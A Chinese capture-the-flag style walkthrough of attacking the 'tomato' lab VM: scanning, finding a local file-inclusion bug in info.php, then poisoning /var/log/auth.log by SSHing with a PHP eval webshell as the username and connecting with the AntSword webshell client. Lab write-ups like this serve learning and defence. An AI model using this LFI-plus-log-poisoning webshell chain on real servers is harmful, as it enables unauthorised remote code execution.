当前位置: 首页 > news >正文

tomato-靶机渗透

tomato-靶机

一、安装靶机环境

下载双击.ova文件,写文件名路径导入

image-20240729163951152
打开虚拟机用NAT模式

image-20240729164230107

编辑–>虚拟网络编辑器查看IP段

image-20240729164258715

二、信息收集

1.御剑端口扫描查找该虚拟机的IP

image-20240729164847351

访问网站

image-20240729164853240

扫目录

dirb http://192.168.30.130 

image-20240729184105795

收集到目录

/server-status
/antibot_image/
/index.html

访问/antibot_image目录

image-20240729184513313

在目录下找到info.php

image-20240729184632414

查到

根目录:/var/www/html
用户名:webmaster@localhost

查看info.php源代码,提示image参数用于文件包含

image-20240729190126839

三、漏洞渗透

写image参数=linux的系统文件,发现成功显示,确定有文件包含漏洞

image-20240729190309073

2.发现端口没有全部扫描出来,使用这个命令扫描

nmap -A 192.168.30.130 -p-

image-20240729191712482

2211是ssl的连接端口

ssh '<?php @eval($_POST['cmd']);?>'@192.168.30.130 -p 2211

image-20240729193416587

然后在网页端查看ubuntu报错信息:/var/log/auth.log

http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

image-20240729193644266

看到注入成功,然后用蚁剑

URL地址

http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

image-20240729193444317

然后就可以控制整个文件

http://www.lryc.cn/news/410710.html

相关文章:

  • git的配置使用
  • 【1.0】drf初识
  • SparkSQL---编程模型的操作,数据加载与落地及自定义函数的使用
  • 文件解析漏洞--IIS--Vulhub
  • 你知道缓存的这个问题到底把多少程序员坑惨了吗?
  • 飞创直线模组桁架机械手优势及应用领域
  • TongHttpServer 简介
  • 回溯法---组合总和
  • 将Android Library项目发布到JitPack仓库
  • JAVAWeb实战(后端篇)
  • 【vs】实用调试技巧——学会写优秀的代码!
  • 数组声明方式
  • Docker中Docker网络-理解Docker0与自定义网络的使用示例
  • 领域驱动大型结构之SYSTEM METAPHOR(系统隐喻)
  • web前端开发一、VScode环境搭建
  • DiAD代码use_checkpoint
  • nginx出现Refused to apply inline style because it violates
  • 【中项第三版】系统集成项目管理工程师 | 第 11 章 规划过程组⑥ | 11.15 - 11.17
  • 基础警务互联网app
  • 为了方便写CURD代码,我在UTools写了个插件SqlConvert来生成代码!
  • 在国产芯片上实现YOLOv5/v8图像AI识别-【2.2】RK3588上C++开发环境准备及测试更多内容见视频
  • 2024数据资产入表财务实操手册
  • react.16+
  • 如何实现MySQL对某一张表的binlog日志进行记录
  • 使用requests库进行网络爬虫:入门指南
  • 实验5-1 使用函数计算两点间的距离
  • 免费!OpenAI发布最新模型GPT-4o mini,取代GPT-3.5,GPT-3.5退出历史舞台?
  • 目标检测损失计算部分(YOLO)
  • Swift 方法
  • 哪些牌子充电宝性价比比较高?目前公认比较好用充电宝都在这儿!